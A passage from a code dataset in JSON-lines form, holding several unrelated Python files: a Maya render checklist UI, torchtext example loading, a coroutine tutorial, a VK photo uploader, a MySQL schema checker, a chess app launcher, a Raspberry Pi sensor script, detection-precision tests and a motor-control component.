self.labelname==u'deadline提交渲染':\n\t\t\th=u'''\ndeadline提交渲染。\n'''\n\t\t\treturn h\n\n\tdef button_ts(self,*args):\n\t\tif cmds.columnLayout('RenderSeting_H_col',ex=True):\n\t\t\tcmds.deleteUI('RenderSeting_H_col')\n\t\tcmds.columnLayout('RenderSeting_H_col',adj=True,p='ann_ts_frame')\n\t\tcmds.scrollField(ww=True,editable=False,text=self.button_h(),h=321,p='RenderSeting_H_col')\n#\t\tcmds.text(l=self.button_h(),al='left')\n\nclass CreateButton(object):\n\tdef create_button(self,is_CJ):\n\t\tif 
is_CJ:\n\t\t\tlabels=[u'搜索是否带有“_rig_slice.ma”关键字',u'制作cache文件',u'切换到材质模型',u'确认主光方向',u'设置assetID,并检查',\n\t\t\t\t\tu'导入场景进行优化',u'优化场景',u'清除灯光连接',u'导出场景影响角色物体(Occ,shadow)',u'导出场景影响角色物体(mask)',\n\t\t\t\t\tu'优化无用的材质和材质球',u'拷贝贴图至本地',u'贴图精度优化',u'导入相应灯光rig(CJ)',u'设置摄像机的远近裁切平面',\n\t\t\t\t\tu'灯光使用shadowMap(MR)',u'分层设置',u'细分代理',u'另存场景',u'场景渲染测试',u'渲染连续5帧(1280尺寸)',\n\t\t\t\t\tu'文件贴图过滤',u'请提高阴影品质',u'修改原始模型',u'贴图路径指回服务器',u'指定渲染前需要执行的mel',\n\t\t\t\t\tu'另存Occ文件',u'文件提交服务器',u'deadline提交渲染']\n\t\telse:\n\t\t\tlabels=[u'搜索是否带有“_rig_slice.ma”关键字',u'制作cache文件',u'切换到材质模型',u'确认主光方向',u'保存角色交互的场景文件',u'设置assetID,并检查',\n\t\t\t\t\tu'导入场景进行优化',u'清除灯光连接',u'拷贝贴图至本地',u'导入场景影响角色物体(Occ,shadow)',u'导入场景影响角色物体(mask)',\n\t\t\t\t\tu'优化sssMap',u'贴图精度优化',u'建立HDR环境球',u'导入相应灯光rig(JS)',u'设置摄像机的远近裁切平面',\n\t\t\t\t\tu'灯光使用shadowMap(MR)',u'分层设置',u'细分代理',u'另存场景',u'场景渲染测试',u'渲染连续5帧(1280尺寸)',\n\t\t\t\t\tu'文件贴图过滤',u'请提高阴影品质',u'修改原始模型',u'贴图路径指回服务器',u'指定渲染前需要执行的mel',\n\t\t\t\t\tu'另存Occ文件',u'文件提交服务器',u'deadline提交渲染']\n\t\tan_col=cmds.columnLayout(adj=True,rs=2)\n\t\tfor label in labels:\n\t\t\tcmds.setParent(an_col)\n\t\t\tbb=ZhuButton(is_CJ)\n\t\t\tbb.setname(label)\n\t\t\tbb.createButton()\n\n\n\ndef checkR():\n\taa=CheckRenderSeting()\n\taa.setUiName('checkRenderseting_win')\n\taa.creatUi()\nif __name__=='__main__':\n\tcheckR()","repo_name":"zhengweifu/zhengweifu.github.io","sub_path":"assets/images/threeToolDev/lighting_render/CheckRenderSeting.py","file_name":"CheckRenderSeting.py","file_ext":"py","file_size_in_byte":19620,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21812541829","text":"import json\n\nimport six\n\n\nclass Example(object):\n \"\"\"Defines a single training or test example.\n\n Stores each column of the example as an attribute.\n \"\"\"\n\n @classmethod\n def fromJSON(cls, data, fields):\n return cls.fromdict(json.loads(data), fields)\n\n @classmethod\n def fromdict(cls, data, fields):\n ex = cls()\n for key, vals in fields.items():\n if key not in data:\n raise ValueError(\"Specified key {} was not found in \"\n \"the input data\".format(key))\n if vals is not None:\n if not isinstance(vals, list):\n vals = [vals]\n for val in vals:\n name, field = val\n setattr(ex, name, field.preprocess(data[key]))\n return ex\n\n @classmethod\n def fromCSV(cls, data, fields, field_to_index=None):\n if field_to_index is None:\n return cls.fromlist(data, fields)\n else:\n assert(isinstance(fields, dict))\n data_dict = {f: data[idx] for f, idx in field_to_index.items()}\n return cls.fromdict(data_dict, fields)\n\n @classmethod\n def fromlist(cls, data, fields):\n ex = cls()\n for (name, field), val in zip(fields, data):\n if field is not None:\n if isinstance(val, six.string_types):\n val = val.rstrip('\\n')\n # Handle field tuples\n if isinstance(name, tuple):\n for n, f in zip(name, field):\n setattr(ex, n, f.preprocess(val))\n else:\n setattr(ex, name, field.preprocess(val))\n return ex\n\n @classmethod\n def fromtree(cls, data, fields, subtrees=False):\n try:\n from nltk.tree import Tree\n except ImportError:\n print(\"Please install NLTK. 
\"\n \"See the docs at http://nltk.org for more information.\")\n raise\n tree = Tree.fromstring(data)\n if subtrees:\n return [cls.fromlist(\n [' '.join(t.leaves()), t.label()], fields) for t in tree.subtrees()]\n return cls.fromlist([' '.join(tree.leaves()), tree.label()], fields)\n","repo_name":"Sudy/coling2018","sub_path":"torchtext/data/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"60"} +{"seq_id":"19936280276","text":"def number_coroutine():\n while True:\n x = (yield)\n print(x, end=' ')\n\n\nco = number_coroutine()\nnext(co)\n\nfor i in range(20):\n co.send(i)\n\nco.close() # 코루틴 종료\n\n\ndef number_coroutine():\n # NOTE: coroutine with error\n try:\n while True:\n x = (yield)\n print(x, end=' ')\n except GeneratorExit: # 코루틴이 종료 될 때 GeneratorExit 예외 발생\n print()\n print('코루틴 종료')\n\n\nco = number_coroutine()\nnext(co)\n\nfor i in range(20):\n co.send(i)\n\nco.close()\n\n\ndef sum_coroutine():\n # couroutine with custom error\n try:\n total = 0\n while True:\n x = (yield)\n total += x\n except RuntimeError as e:\n print(e)\n yield total # 코루틴 바깥으로 값 전달\n\n\nco = sum_coroutine()\nnext(co)\n\nfor i in range(20):\n co.send(i)\n\nprint(co.throw(RuntimeError, '예외로 코루틴 끝내기')) # 190\n\"\"\"\n예외로 코루틴 끝내기\n190\n\"\"\"\n","repo_name":"wonjinsin/TIL","sub_path":"python/코딩 도장/41.3 coroutine close.py","file_name":"41.3 coroutine close.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21161478433","text":"import vk\nimport settings\nimport requests\n\n\ndef upload_photo_to_album(path_of_file):\n\n session = vk.AuthSession(access_token=settings.user_access_token)\n vk_api = vk.API(session, v=settings.vk_api_version)\n\n upload_url = vk_api.photos.getUploadServer(group_id=settings.group_for_photos_id,\n album_id=settings.album_id)['upload_url']\n\n request = requests.post(upload_url,\n files={'photo': open(path_of_file, \"rb\")})\n\n photo = vk_api.photos.save(album_id='255140841',\n group_id=settings.group_for_photos_id,\n server=request.json()['server'],\n photos_list=request.json()['photos_list'],\n hash=request.json()['hash'])[0]\n photo_id = photo['id']\n\n photo_parameters = 'photo-' + settings.group_for_photos_id + '_' + str(photo_id)\n return photo_parameters\n","repo_name":"alexvi88/vk_posting_photos","sub_path":"uploading_photo_to_album.py","file_name":"uploading_photo_to_album.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"41716844350","text":"# from mysqlExecute import MysqlExecute\n# from myDocx import MyDocx\nfrom compareData import MysqlInfo\nfrom compareData import DocxInfo\nfrom configuration import Configuration\nfrom logService import LogService\n\nimport pymysql\nimport myExcel\nimport time\n\n\nlogService = LogService()\nCONFIG = Configuration()\ndoc_config = CONFIG.doc_config_dict\ncompare_config = CONFIG.compare_config_dict\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check(_doc_table_info, _database_table_info):\n if _database_table_info is None:\n return False\n _check_res = list()\n err_map = dict()\n err_map['table'] = dict()\n err_map['params'] = dict()\n _check_flag = False\n database_params_info = _database_table_info['param_info']\n doc_params_info = _doc_table_info['params']\n for param_name in database_params_info:\n 
if param_name in doc_params_info.keys():\n type_flag = doc_params_info[param_name]['type'] == database_params_info[param_name]['type']\n key_flag = check_only(_database_param_info=database_params_info[param_name], _doc_param_info=doc_params_info[param_name])\n null_flag = check_null(_database_param_info=database_params_info[param_name], _doc_param_info=doc_params_info[param_name])\n index_flag = check_index(_database_param_info=database_params_info[param_name], _doc_param_info=doc_params_info[param_name])\n default_flag = check_default(_database_param_info=database_params_info[param_name], _doc_param_info=doc_params_info[param_name])\n comment_flag = check_comment(_database_param_info=database_params_info[param_name], _doc_param_info=doc_params_info[param_name])\n _check_flag = type_flag and key_flag and null_flag and index_flag and default_flag and comment_flag\n database_params_info[param_name]['checked'] = 'yes'\n doc_params_info[param_name]['checked'] = 'yes'\n if _check_flag is False:\n err_map['params'][param_name] = dict()\n if type_flag is False:\n err_map['params'][param_name]['type_err'] = u'数据字典:' + str(doc_params_info[param_name]['type_ori']) + u' 数据库:' + str(database_params_info[param_name]['type'])\n if key_flag is False:\n err_map['params'][param_name]['is_only_err'] = u'数据字典:' + str(doc_params_info[param_name]['is_only_ori']) + u' 数据库:' + str(database_params_info[param_name]['is_only'])\n if null_flag is False:\n err_map['params'][param_name]['is_null_err'] = u'数据字典:' + str(doc_params_info[param_name]['is_null_ori']) + u' 数据库:' + str(database_params_info[param_name]['is_null'])\n if index_flag is False:\n err_map['params'][param_name]['index_err'] = u'数据字典:' + str(doc_params_info[param_name]['is_index_ori']) + u' 数据库:' + str(database_params_info[param_name]['is_index'])\n if default_flag is False:\n err_map['params'][param_name]['default_err'] = u'数据字典:' + str(doc_params_info[param_name]['default_ori']) + u' 数据库:' + str(database_params_info[param_name]['default'])\n if comment_flag is False:\n err_map['params'][param_name]['comment_err'] = u'数据字典:' + str(doc_params_info[param_name]['comment_ori']) + u' 数据库:' + str(database_params_info[param_name]['comment'])\n for param_name in database_params_info.keys():\n if 'checked' not in database_params_info[param_name].keys():\n err_map['params'][param_name] = dict()\n err_map['params'][param_name]['exist'] = u'数据字典缺失字段'\n for param_name in doc_params_info.keys():\n if 'checked' not in doc_params_info[param_name].keys():\n err_map['params'][param_name] = dict()\n err_map['params'][param_name]['exist'] = u'数据库缺失字段'\n\n database_engine_flag = True\n union_index_flag = True\n default_charset_flag = True\n if doc_config['tableEngineFlag']:\n database_engine_flag = database_engine_check(_database_table_info=_database_table_info, _doc_table_info=_doc_table_info)\n if doc_config['unionIndexFlag']:\n union_index_flag = union_index_check(_database_table_info=_database_table_info, _doc_table_info=_doc_table_info)\n if doc_config['tableDefaultCharsetFlag']:\n default_charset_flag = default_charset_check(_database_table_info=_database_table_info, _doc_table_info=_doc_table_info)\n\n if database_engine_flag is False or union_index_flag is False or default_charset_flag is False:\n if database_engine_flag is False:\n err_map['table']['database_engine_err'] = u'数据字典:' + str(_doc_table_info['database_engine_ori']) + u' 数据库:' + str(_database_table_info['database_engine'])\n if union_index_flag is False:\n err_map['table']['union_index_err'] = 
u'数据字典:' + str(_doc_table_info['union_index_ori']) + u' 数据库:' + str(_database_table_info['union_index_ori'])\n if default_charset_flag is False:\n err_map['table']['default_charset_err'] = u'数据字典:' + str(_doc_table_info['default_charset']) + u' 数据库:' + str(_database_table_info['default_charset'])\n return err_map\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef union_index_check(_database_table_info, _doc_table_info):\n if len(_database_table_info['union_index'].keys()) != len(_doc_table_info['union_index'].keys()):\n return False\n else:\n for key_name in _database_table_info['union_index']:\n if key_name not in _doc_table_info['union_index']:\n return False\n if len(_database_table_info['union_index'][key_name]) != len(_doc_table_info['union_index'][key_name]):\n return False\n for param in _database_table_info['union_index'][key_name]:\n if param not in _doc_table_info['union_index'][key_name]:\n return False\n return True\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef default_charset_check(_database_table_info, _doc_table_info):\n if _database_table_info['default_charset'] == _doc_table_info['default_charset']:\n return True\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef database_engine_check(_database_table_info, _doc_table_info):\n if _database_table_info['database_engine'] == _doc_table_info['database_engine']:\n return True\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_only(_database_param_info, _doc_param_info):\n if _database_param_info['is_only'] == _doc_param_info['is_only']:\n return True\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_null(_database_param_info, _doc_param_info):\n if _database_param_info['is_null'] == _doc_param_info['is_null']:\n return True\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_index(_database_param_info, _doc_param_info):\n if _database_param_info['is_index'] == _doc_param_info['is_index']:\n return True\n elif _database_param_info['is_index'] == 'PRI' or _database_param_info['is_index'] == 'MUL' or _database_param_info['is_index'] == 'UNI':\n if _doc_param_info['is_index'] == 'y':\n return True\n else:\n return False\n else:\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_default(_database_param_info, _doc_param_info):\n if _database_param_info['default'] == '' and _doc_param_info['default'] == 'EMPTY_STRING':\n return True\n if _database_param_info['default'] == '' and _doc_param_info['default'] == 'EMPTY STRING':\n return True\n # if _database_param_info['default'] == 'NULL' and _doc_param_info['default'] == '':\n # return True\n if _database_param_info['default'] == _doc_param_info['default']:\n return True\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_comment(_database_param_info, _doc_param_info):\n database_temp = _database_param_info['comment'].replace('\\\\r\\\\n ', '\\\\n')\n doc_temp = _doc_param_info['comment']\n if compare_config['commentIgnoreCaseFlag']:\n doc_temp = doc_temp.lower()\n database_temp = database_temp.lower()\n if compare_config['commentIgnorePreAndPostSpaceFlag']:\n doc_temp = doc_temp.strip(' ')\n database_temp = database_temp.strip(' ')\n if compare_config['commentIgnoreLineFeedFlag']:\n doc_temp = doc_temp.replace('\\r\\n ', '').replace('\\r', '').replace('\\n', '')\n database_temp = database_temp.replace('\\\\r\\\\n ', '').replace('\\\\r', '').replace('\\\\n', '')\n if database_temp == doc_temp:\n 
return True\n # print(_doc_param_info['comment'])\n # print(_database_param_info['comment'])\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_run(_database, _doc):\n # print(_database.get_table_list())\n # print(_doc.table_info_list)\n filename = round(time.time())\n excel = myExcel.MyExcel('./' + str(filename) + '.xlsx')\n table_info_list = _doc.table_info_list\n # print(table_info_list)\n for doc_table_info in table_info_list:\n if doc_table_info is None:\n continue\n table_name = doc_table_info['table_name']\n try:\n table_info = _database.get_table_info(table_name=table_name)\n\n except pymysql.err.Error as err:\n print(err)\n continue\n check_err = check(_doc_table_info=doc_table_info, _database_table_info=table_info)\n # print(check_err)\n excel.col_write(check_err, table_name)\n excel.save()\n\n\nif __name__ == '__main__':\n mysql_info = MysqlInfo(host='', user='', password='', db='')\n # docx_info = DocxInfo('')\n docx_info = DocxInfo('')\n # for aa in docx_info.table_info_list:\n # print(aa)\n # print(docx_info)\n check_run(_database=mysql_info, _doc=docx_info)\n","repo_name":"stripgentleman/autoCheckMysql","sub_path":"bin.py","file_name":"bin.py","file_ext":"py","file_size_in_byte":10059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11291222671","text":"\"\"\"Program launcher\n\nchess tournament\n\"\"\"\n\nimport sys\nimport os\nfrom controllers import App\nfrom views import main_menu, all_tournaments_report, TournamentUI\nfrom bcolors import Color\n\n\ndef main_loop(options, tournament):\n \"\"\"Main menu loop\"\"\"\n while True:\n index = main_menu()\n if index == 0:\n print(options[index])\n break\n if index == 9:\n if App.tournaments:\n tournament.menu(len(App.tournaments) - 1)\n elif index >= 0 and index < 5:\n i = options[index]()\n if i is not None:\n tournament.menu(i)\n else:\n input(f\"{Color.OKBLUE}Press ENTER to continue...{Color.ENDC}\")\n\n\ndef main():\n \"\"\"Main function, program initialization\"\"\"\n filename = os.path.split(os.path.abspath(__file__))\n App.program_initialization(filename[0])\n tournament = TournamentUI(filename[0])\n options = [\"Exit\", tournament.create, tournament.select, all_tournaments_report, tournament.edit_player_rank]\n\n if App.tournaments:\n if not App.tournaments[-1].rounds or not App.tournaments[-1].rounds[-1].end:\n tournament.menu(len(App.tournaments) - 1)\n else:\n print(f\"{Color.WARNING}No tournament available...{Color.ENDC}\")\n i = tournament.create()\n if i is not None:\n tournament.menu(i)\n main_loop(options, tournament)\n return sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"josayko-courses/chess_tournament","sub_path":"chess_tournament/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30038811909","text":"import RPi.GPIO as GPIO\nimport time\n\ninfrared1 = 20\ninfrared2 = 21\n \nGPIO.setmode(GPIO.BCM) # setmode를 BCM으로 설정\nGPIO.setup(infrared1, GPIO.IN) # 적외선 장애물 감지 센서 설정\nGPIO.setup(infrared2, GPIO.IN) \n\n\nwhile 1:\n state1 = GPIO.input(infrared1)\n state2 = GPIO.input(infrared2)\n \n t = time.localtime()\n print(f\"{t.tm_hour}:{t.tm_min}:{t.tm_sec} : \", end=\" \")\n print(f\"first : {state1}\", end=\" \")\n print(f\"second : {state2}\")\n\n 
time.sleep(1)","repo_name":"ndg5778/smartfactory","sub_path":"test/raspberry/infrared.py","file_name":"infrared.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37213512589","text":"#!/usr/bin/env python3\n# from copy import deepcopy\nfrom box import Box\nimport precision as p\n\ntest_iou_threshold = 0.3\ntest_upper_left_x = 50\ntest_upper_left_y = 60\ntest_upper_left = (test_upper_left_x, test_upper_left_y)\ntest_width = 100\ntest_height = 200\ntest_box_pred = Box(\n upper_left=test_upper_left,\n width=test_width,\n height=test_height,\n pred_labels=[{\n 'label': 'julie',\n 'prob': 0.6,\n }, {\n 'label': 'angela',\n 'prob': 0.2,\n }, {\n 'label': 'arbit',\n 'prob': 0.15,\n }, {\n 'label': 'taco',\n 'prob': 0.05,\n }])\ntest_box_low_iou = Box(\n label='julie',\n upper_left=test_upper_left,\n width=test_width * 5,\n height=test_height * 10, )\ntest_box_high_iou = Box(\n label='angela',\n upper_left=test_upper_left,\n width=test_width / 4,\n height=test_height / 2, )\ntest_box_no_overlap = Box(\n label='arbit',\n upper_left=(test_upper_left_x + test_width, test_upper_left_y),\n width=test_width,\n height=test_height, )\ntest_boxes_truth = [test_box_low_iou, test_box_high_iou, test_box_no_overlap]\n# Note that we put two items with the same recall but different precision.\ntest_precision_recall_pairs = [{\n 'precision': 0.8,\n 'recall': 0.25,\n}, {\n 'precision': 0.6,\n 'recall': 0.4,\n}, {\n 'precision': 0.1,\n 'recall': 0.7,\n}, {\n 'precision': 0.4,\n 'recall': 0.95,\n}, {\n 'precision': 0.2,\n 'recall': 0.95,\n}, {\n 'precision': 0.3,\n 'recall': 1.0,\n}]\n\n\ndef test_get_hit_rank_no_overlap():\n \"\"\"It tests the case that no box overlaps the ground truth.\n \"\"\"\n actual = p.get_hit_rank(\n test_box_pred, [test_box_no_overlap], topn=10, iou_th=0.9)\n expected = {\n 'max_iou': 0.0,\n 'is_box_detected': False,\n 'rank': -1,\n 'label': '',\n }\n assert actual == expected\n\n\ndef test_get_hit_rank_iou_too_low():\n \"\"\"It tests the case that the iou of all the boxes are\n lower than the threshold.\n \"\"\"\n actual = p.get_hit_rank(\n test_box_pred, test_boxes_truth, topn=10, iou_th=0.9)\n # The candidate is the test_box_high_iou with iou 1 / (4 * 2)\n expected = {\n 'max_iou': 1 / (4 * 2),\n 'is_box_detected': False,\n 'rank': 1,\n 'label': 'angela',\n }\n assert actual == expected\n\n\ndef test_get_hit_rank_match_topn():\n \"\"\"It tests the cases that it overlaps some box\n but the results depends on the choice of topn.\n \"\"\"\n # Test the case that it overlaps some box but\n # the matched label is of the rank not covered by topn.\n actual = p.get_hit_rank(\n test_box_pred, test_boxes_truth, topn=1, iou_th=0.1)\n expected = {\n 'max_iou': 1 / (4 * 2),\n 'is_box_detected': True,\n 'rank': -1,\n 'label': '',\n }\n assert actual == expected\n\n # Test the case that it overlaps some box and\n # it returns the rank of label predicted.\n actual = p.get_hit_rank(\n test_box_pred, test_boxes_truth, topn=3, iou_th=0.1)\n expected = {\n 'max_iou': 1 / (4 * 2),\n 'is_box_detected': True,\n 'rank': 1,\n 'label': 'angela',\n }\n assert actual == expected\n\n # Test the case that it overlaps some box and\n # the topn input is too large.\n actual = p.get_hit_rank(\n test_box_pred, test_boxes_truth, topn=100, iou_th=0.1)\n expected = {\n 'max_iou': 1 / (4 * 2),\n 'is_box_detected': True,\n 'rank': 1,\n 'label': 'angela',\n }\n assert actual == expected\n\n\ndef 
test_get_hit_rank_wrong_label():\n \"\"\"It tests the case that it overlaps to some box\n but no label matches.\n \"\"\"\n boxes_truth = [\n Box(\n label='no_one_matches',\n upper_left=test_upper_left,\n width=test_width,\n height=test_height)\n ]\n actual = p.get_hit_rank(test_box_pred, boxes_truth, topn=4, iou_th=0.9)\n expected = {\n 'max_iou': 1.0,\n 'is_box_detected': True,\n 'rank': -1,\n 'label': '',\n }\n assert actual == expected\n\n\ndef test_get_itpl_precision():\n # Test the case if the recall input is too large.\n assert p.get_itpl_precision(1.1, test_precision_recall_pairs) == 0.0\n\n # Test the case that there is at least one item with larger recall\n # than the one input.\n assert p.get_itpl_precision(0.5, test_precision_recall_pairs) == 0.4\n\n\ndef test_get_average_precision():\n pairs = test_precision_recall_pairs\n grids = [0.0, 0.2, 0.4, 0.6, 0.8, 1.0]\n assert abs(p.get_average_precision(pairs, grids) - 0.55) < 1e-6\n","repo_name":"alienlien/dolphin-id","sub_path":"precision_test.py","file_name":"precision_test.py","file_ext":"py","file_size_in_byte":4556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15460485955","text":"# -*- coding: utf-8 -*-\n\"\"\"\n解く前のメモ用\n\n以下解説AC\n本iを持っている場合は1冊、持っていない場合は2冊消費して本iを読める\nなので1巻数から初めてあれば1冊を引く、なければ2冊を引くというように数え上げて行けば良い\n\"\"\"\nfrom sys import setrecursionlimit\n\nsetrecursionlimit(10**7)\n\nN = int(input())\nA = list(map(int, input().split()))\nS = set(A)\nread = 0\nwhile N >= 0:\n read += 1\n N -= 1 if read in S else 2\nprint(read - 1)\n","repo_name":"bun913/atcoder_python","sub_path":"abc271/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20732821396","text":"# -*- coding: utf-8 -*-\n\"\"\"The Raspberry bmp thread\n\nServer files using the http protocol\n\n\"\"\"\n\n__license__ = \"\"\"\n This file is part of Janitoo.\n\n Janitoo is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n Janitoo is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with Janitoo. 
If not, see .\n\n\"\"\"\n__author__ = 'Sébastien GALLET aka bibi21000'\n__email__ = 'bibi21000@gmail.com'\n__copyright__ = \"Copyright © 2013-2014-2015-2016 Sébastien GALLET aka bibi21000\"\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom janitoo.component import JNTComponent\n\ntry:\n from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_StepperMotor, Adafruit_DCMotor\nexcept IOError:\n\n class Adafruit_MotorHAT(object):\n \"\"\" Fake class to allow buil on Continuous Integration tools.\n \"\"\"\n pass\n\n class Adafruit_StepperMotor(object):\n \"\"\" Fake class to allow buil on Continuous Integration tools.\n \"\"\"\n pass\n\n class Adafruit_DCMotor(object):\n \"\"\" Fake class to allow buil on Continuous Integration tools.\n \"\"\"\n pass\n\n logger.exception(\"Can't import Adafruit_MotorHAT\")\n\n##############################################################\n#Check that we are in sync with the official command classes\n#Must be implemented for non-regression\nfrom janitoo.classes import COMMAND_DESC\n\nCOMMAND_MOTOR = 0x3100\nCOMMAND_SWITCH_MULTILEVEL = 0x0026\nCOMMAND_SWITCH_BINARY = 0x0025\n\nassert(COMMAND_DESC[COMMAND_SWITCH_MULTILEVEL] == 'COMMAND_SWITCH_MULTILEVEL')\nassert(COMMAND_DESC[COMMAND_SWITCH_BINARY] == 'COMMAND_SWITCH_BINARY')\nassert(COMMAND_DESC[COMMAND_MOTOR] == 'COMMAND_MOTOR')\n##############################################################\n\nfrom janitoo_raspberry_i2c import OID\n\ndef make_dcmotor(**kwargs):\n return DcMotorComponent(**kwargs)\n\ndef make_pwm(**kwargs):\n return PwmComponent(**kwargs)\n\ndef make_stepmotor(**kwargs):\n return StepMotorComponent(**kwargs)\n\ndef make_servo(**kwargs):\n return ServoComponent(**kwargs)\n\nclass DcMotorComponent(JNTComponent):\n \"\"\" A DC motor component for gpio \"\"\"\n\n def __init__(self, bus=None, addr=None, **kwargs):\n \"\"\"\n \"\"\"\n oid = kwargs.pop('oid', '%s.dcmotor'%OID)\n name = kwargs.pop('name', \"Motor\")\n product_name = kwargs.pop('product_name', \"Motor\")\n product_type = kwargs.pop('product_type', \"DC Motor\")\n JNTComponent.__init__(self, oid=oid, bus=bus, addr=addr, name=name,\n product_name=product_name, product_type=product_type, **kwargs)\n logger.debug(\"[%s] - __init__ node uuid:%s\", self.__class__.__name__, self.uuid)\n uuid=\"speed\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The speed of the motor. A byte from 0 to 255',\n label='Speed',\n default=0,\n set_data_cb=self.set_speed,\n )\n uuid=\"max_speed\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help=\"The max speed supported by the motor. Some motor doesn't seems support 100% PWM. A byte from 0 to 255\",\n label='Speed',\n default=255,\n )\n uuid=\"num\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The number of the motor on the Hat board. 
A byte from 1 to 4',\n label='Num.',\n )\n uuid=\"actions\"\n self.values[uuid] = self.value_factory['action_list'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The action on the DC motor',\n label='Actions',\n list_items=['forward', 'backward', 'release'],\n default='release',\n set_data_cb=self.set_action,\n is_writeonly = True,\n cmd_class=COMMAND_MOTOR,\n genre=0x01,\n )\n uuid=\"current_speed\"\n self.values[uuid] = self.value_factory['sensor_integer'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The current speed of the motor. An integer from -255 to 255',\n label='CSpeed',\n get_data_cb=self.get_current_speed,\n )\n poll_value = self.values[uuid].create_poll_value(default=300)\n self.values[poll_value.uuid] = poll_value\n\n def get_current_speed(self, node_uuid, index):\n \"\"\"Get the current speed\n \"\"\"\n current_state = self.values['actions'].get_data_index(index=index)\n if current_state == 'forward':\n return self.values['speed'].get_data_index(index=index)\n elif current_state == 'backward':\n return self.values['speed'].get_data_index(index=index) * -1\n else:\n return 0\n\n def set_speed(self, node_uuid, index, data):\n \"\"\"Set the speed ot the motor\n \"\"\"\n self.values['speed'].set_data_index(index=index, data=data)\n try:\n m = self.values['num'].get_data_index(index=index)\n if m is not None:\n self._bus.i2c_acquire()\n try:\n self._bus.pca9685_manager.getMotor(m).setSpeed(data)\n finally:\n self._bus.i2c_release()\n except Exception:\n logger.exception('[%s] - Exception when setting speed')\n\n def set_action(self, node_uuid, index, data):\n \"\"\"Act on the motor\n \"\"\"\n params = {}\n if data == \"forward\":\n try:\n m = self.values['num'].get_data_index(index=index)\n if m is not None:\n self._bus.i2c_acquire()\n try:\n self._bus.pca9685_manager.getMotor(m).run(Adafruit_MotorHAT.FORWARD)\n finally:\n self._bus.i2c_release()\n except Exception:\n logger.exception('[%s] - Exception when running forward')\n elif data == \"backward\":\n try:\n m = self.values['num'].get_data_index(index=index)\n if m is not None:\n self._bus.i2c_acquire()\n try:\n self._bus.pca9685_manager.getMotor(m).run(Adafruit_MotorHAT.BACKWARD)\n finally:\n self._bus.i2c_release()\n except Exception:\n logger.exception('[%s] - Exception when running backward')\n elif data == \"release\":\n m = self.values['num'].get_data_index(index=index)\n if m is not None:\n try:\n self._bus.i2c_acquire()\n try:\n self._bus.pca9685_manager.getMotor(m).run(Adafruit_MotorHAT.RELEASE)\n finally:\n self._bus.i2c_release()\n except Exception:\n logger.exception('[%s] - Exception when releasing one motor %s', self.__class__.__name__, m)\n\nclass StepMotorComponent(JNTComponent):\n \"\"\" A stepper motor component\"\"\"\n\n def __init__(self, bus=None, addr=None, **kwargs):\n \"\"\"\n \"\"\"\n oid = kwargs.pop('oid', '%s.stepmotor'%OID)\n name = kwargs.pop('name', \"Motor\")\n product_name = kwargs.pop('product_name', \"Motor\")\n product_type = kwargs.pop('product_type', \"Step Motor\")\n product_manufacturer = kwargs.pop('product_manufacturer', \"Janitoo\")\n JNTComponent.__init__(self, oid=oid, bus=bus, addr=addr, name=name,\n product_name=product_name, product_type=product_type, product_manufacturer=product_manufacturer, **kwargs)\n logger.debug(\"[%s] - __init__ node uuid:%s\", self.__class__.__name__, self.uuid)\n\nclass PwmComponent(JNTComponent):\n \"\"\" A led driver component\"\"\"\n\n def __init__(self, bus=None, addr=None, **kwargs):\n \"\"\"\n \"\"\"\n oid = 
